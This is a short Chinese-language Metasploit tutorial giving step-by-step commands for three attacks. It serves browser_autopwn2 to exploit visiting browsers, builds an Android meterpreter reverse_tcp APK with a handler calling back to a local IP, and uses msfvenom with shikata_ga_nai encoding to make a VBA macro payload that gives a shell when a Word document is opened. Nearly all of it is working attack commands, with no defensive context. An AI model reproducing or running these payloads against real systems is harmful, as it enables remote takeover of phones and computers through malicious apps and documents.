浏览器、安卓、VBScript

auxiliary/server/browser_autopwn2模块

msf > use auxiliary/server/browser_autopwn2

msf auxiliary(browser_autopwn2) > set srvport 80

msf auxiliary(browser_autopwn2) > set uripath /

msf auxiliary(browser_autopwn2) > exploit

通过浏览器,去访问http://192.168.80.163/

msf > kill 0  关闭时,只需要kill 0


生成安卓apk

msf > use payload/android/meterpreter/reverse_tcp

msf payload(reverse_tcp) > set lhost 192.168.80.163

msf payload(reverse_tcp) > generate -p android -f a.apk -t raw


msf exploit(handler) > set payload android/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.80.163

msf exploit(handler) > exploit

在手机上安装a.apk文件。


VBScript感染方式

root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe

生成2部分内容:①VBA代码 ②十六进制的payload

利用过程:

第一部分粘入VBA代码(视图--宏--创建)

第二部分粘入word文档正文

打开word文档,MSF会获得目标主机的shell。

你可能感兴趣的:(浏览器、安卓、VBScript)